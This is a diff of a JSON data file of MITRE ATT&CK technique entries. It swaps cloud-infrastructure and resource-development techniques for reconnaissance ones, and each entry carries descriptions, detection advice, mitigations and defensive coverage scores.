+                "description": "Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1578.003",
-                "name": "Modify Cloud Compute Infrastructure: Delete Cloud Instance",
-                "url": "https://attack.mitre.org/techniques/T1578/003",
-                "description": "An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.\n\nAn adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)",
-                "detection": "The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.\n\nIn AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete to delete a VM.(Citation: Cloud Audit Logs)",
+                "tid": "T1591.003",
+                "name": "Gather Victim Org Information: Identify Business Tempo",
+                "url": "https://attack.mitre.org/techniques/T1591/003",
+                "description": "Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1578.004",
-                "name": "Modify Cloud Compute Infrastructure: Revert Cloud Instance",
-                "url": "https://attack.mitre.org/techniques/T1578/004",
-                "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)",
-                "detection": "Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.",
-                "mitigations": []
+                "tid": "T1591.004",
+                "name": "Gather Victim Org Information: Identify Roles",
+                "url": "https://attack.mitre.org/techniques/T1591/004",
+                "description": "Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+                "mitigations": [
+                    {
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
+                    }
+                ]
             }
         ],
         "mitigations": [
             {
-                "mid": "M1047",
-                "name": "Audit",
-                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                "url": "https://attack.mitre.org/mitigations/M1047"
-            },
-            {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 0.28095238095238095,
-        "adjusted_score": 0.28095238095238095,
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [
-            "4.7",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
-            "6.8",
-            "18.3",
-            "18.5"
-        ],
-        "nist_controls": [
-            "AC-2",
-            "AC-3",
-            "AC-5",
-            "AC-6",
-            "CA-8",
-            "CM-5",
-            "IA-2",
-            "IA-4",
-            "IA-6",
-            "RA-5",
-            "SI-4"
-        ],
+        "cis_controls": [],
+        "nist_controls": [],
         "process_coverage": false,
         "network_coverage": false,
         "file_coverage": false,
-        "cloud_coverage": true,
+        "cloud_coverage": false,
         "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.18095238095238098,
-            "mitigation_score": 0.34545454545454546
-        },
-        "choke_point_score": 0.1,
+        "actionability_score": {},
+        "choke_point_score": 0.05,
         "prevalence_score": 0
     },
     {
-        "tid": "T1580",
-        "name": "Cloud Infrastructure Discovery",
-        "description": "An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.\n\nCloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket (Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block). \nSimilarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI)\n\nAn adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.",
-        "url": "https://attack.mitre.org/techniques/T1580",
+        "tid": "T1591.001",
+        "name": "Gather Victim Org Information: Determine Physical Locations",
+        "description": "Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).",
+        "url": "https://attack.mitre.org/techniques/T1591/001",
         "tactics": [
-            "Discovery"
+            "Reconnaissance"
         ],
-        "detection": "Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.",
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
         "platforms": [
-            "IaaS"
+            "PRE"
         ],
-        "data_sources": [
-            "Cloud Storage: Cloud Storage Enumeration",
-            "Cloud Storage: Cloud Storage Metadata",
-            "Instance: Instance Enumeration",
-            "Instance: Instance Metadata",
-            "Snapshot: Snapshot Enumeration",
-            "Snapshot: Snapshot Metadata",
-            "Volume: Volume Enumeration",
-            "Volume: Volume Metadata"
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1591",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1591.002",
+        "name": "Gather Victim Org Information: Business Relationships",
+        "description": "Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
+        "url": "https://attack.mitre.org/techniques/T1591/002",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1591",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 0.2142857142857143,
-        "adjusted_score": 0.2142857142857143,
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [
-            "3.3",
-            "4.7",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
-            "6.8"
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1591.003",
+        "name": "Gather Victim Org Information: Identify Business Tempo",
+        "description": "Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))",
+        "url": "https://attack.mitre.org/techniques/T1591/003",
+        "tactics": [
+            "Reconnaissance"
         ],
-        "nist_controls": [
-            "AC-2",
-            "AC-3",
-            "AC-5",
-            "AC-6",
-            "IA-2"
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1591",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1591.004",
+        "name": "Gather Victim Org Information: Identify Roles",
+        "description": "Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
+        "url": "https://attack.mitre.org/techniques/T1591/004",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1591",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
         ],
+        "cumulative_score": 0.07857142857142857,
+        "adjusted_score": 0.07857142857142857,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
         "process_coverage": false,
         "network_coverage": false,
         "file_coverage": false,
-        "cloud_coverage": true,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.11428571428571428,
-            "mitigation_score": 0.21818181818181817
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "cloud_coverage": false,
+        "hardware_coverage": false
     },
     {
-        "tid": "T1583",
-        "name": "Acquire Infrastructure",
-        "description": "Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.",
-        "url": "https://attack.mitre.org/techniques/T1583",
+        "tid": "T1592",
+        "name": "Gather Victim Host Information",
+        "description": "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+        "url": "https://attack.mitre.org/techniques/T1592",
         "tactics": [
-            "Resource Development"
+            "Reconnaissance"
         ],
-        "detection": "Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. \n\nOnce adversaries have provisioned infrastructure (ex: a server for use in command and control), internet scans may help proactively discover adversary acquired infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
+        "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
         "platforms": [
             "PRE"
         ],
         "data_sources": [
-            "Domain Name: Active DNS",
-            "Domain Name: Domain Registration",
-            "Domain Name: Passive DNS",
-            "Internet Scan: Response Content",
-            "Internet Scan: Response Metadata"
+            "Internet Scan: Response Content"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1583.001",
-                "name": "Acquire Infrastructure: Domains",
-                "url": "https://attack.mitre.org/techniques/T1583/001",
-                "description": "Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.\n\nAdversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016)\n\nDomain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)",
-                "detection": "Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.(Citation: ThreatConnect Infrastructure Dec 2020)\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.",
+                "tid": "T1592.001",
+                "name": "Gather Victim Host Information: Hardware",
+                "url": "https://attack.mitre.org/techniques/T1592/001",
+                "description": "Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).",
+                "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
                         "mid": "M1056",
@@ -18471,11 +41101,11 @@
                 ]
             },
             {
-                "tid": "T1583.002",
-                "name": "Acquire Infrastructure: DNS Server",
-                "url": "https://attack.mitre.org/techniques/T1583/002",
-                "description": "Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.\n\nBy running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)",
-                "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
+                "tid": "T1592.002",
+                "name": "Gather Victim Host Information: Software",
+                "url": "https://attack.mitre.org/techniques/T1592/002",
+                "description": "Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
